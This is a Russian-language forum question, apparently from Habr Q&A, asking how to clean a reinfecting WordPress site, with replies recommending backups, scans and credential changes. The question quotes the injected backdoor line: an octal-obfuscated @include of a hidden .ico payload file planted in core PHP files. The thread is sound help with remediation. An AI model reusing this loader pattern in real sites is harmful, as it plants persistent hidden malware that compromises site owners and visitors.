Задать вопрос
IgorFCDK1927
@IgorFCDK1927
Junior
wordpress

Как удалить вирус на сайте Wordpress?

В течении месяца на сайте wordpress начали появляться вирусы и не знаю где можно найти причину появления. В файлах index.php и wp-settings.php появляется вредоносный код типа такого 
/*cebb2*/

@include "\057hom\145/o\165ra\146e/y\157ur\141fet\171.co\155.ua\057www\057wp-\151ncl\165des\057js/\164iny\155ce/\056372\067bdd\144.ic\157";

/*cebb2*/


и создается такой файл типа такого .3727bddd.ico . Этот код и файл я удаляю, но через день он опять появляется и причем ico файл постоянно попадает в разные папки, то в wp-includes/js/tinymce, то в wp-content/uploads и другие папки. Удалил уже все темы и установил встроенную, поменял логин и пароль пользователя, удалил все лишние плагины, но ситуация не меняется. Не подскажите что можно сделать в этой ситуации? Спасибо.
  • Вопрос задан
  • 4516 просмотров
Комментировать
Подписаться 3 Средний Комментировать
Решения вопроса 1
alexyarik
@alexyarik
Битрикс разработчик
Самые простые шаги, которые можно предпринять:
Резервные копии
1) Откатиться на доступный автоматический бекап хостинга где не было вируса.
2) Если п.1 не помогает и есть администратор сайта и делали ручные бекапы то можно откатиться на актуальную копию без вирусов.
- сделайте бекап заражённого сайта
3) Если пп 1-2 не помогли, то можно откатиться на любую имеющуюся старую копию с переносом контента с заражённого сайта (xml импорт не используйте)
Антивирусное лечение
1) Подключить антивирусную проверку с лечением, обычно это платная услуга. Если на хостинге нет такой услуги, сменить хостинг.
Профилактика
1) Смена всех доступов
Ответ написан
Комментировать
Комментировать
Пригласить эксперта
Ответы на вопрос 3
lamer350
@lamer350
กำลังสูงสุด
Можно нанять специалиста который все это вычистит. Сами вы вряд ли что то сделаете.
Но мотете попробовать какой то сервис типа virustotal подключить, но он может попросту удалить важный файл, эти файлы необходимо восстановить. Вирус - это не один файл, он создан так чтобы плодится по папкам и его необходимо найти полностью и удалить, а так же найти источник заражения и обезвредить.
Ответ написан
Комментировать
Комментировать
@AlexPasichnyak
Просканируйте сайт плагином NinjaScanner. Я думаю, это только вершина айсберга.
Ничего подозрительного в файле .htaccess нет?
Ответ написан
Комментировать
Комментировать
@glushmann
Эта зараза называется WordPress SoakSoak Favicon Backdoor. Погуглите на єту тему. Сам страдаю от него уже достаточно долго. удается вычистить. а потом опять всплывает через длительное время.
Вот в помощь старая статья. Не решает проблемы. но дает направления поиска.
https://seosreda.com.ua/wordpress-i-virusyi-kak-iz...
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
Вакансии с Хабр Карьеры
Администратор сайта (Wordpress)
Private-Team
от 700 $
Fullstack Wordpress Developer
WowVendor
от 140 000 до 165 000 ₽
Fullstack Developer под Wordpress
Future Search
от 90 000 до 150 000 ₽
Ещё вакансии
Заказы с Хабр Фриланса
Сделать прошивку контроллера pic-ах
05 нояб. 2024, в 15:12
80000 руб./за проект
Разработать расширение для Chrome
05 нояб. 2024, в 14:46
200000 руб./за проект
Ищу Разработчика для мобильного чат бота (Mental Health)
05 нояб. 2024, в 14:45
100000 руб./за проект
Ещё заказы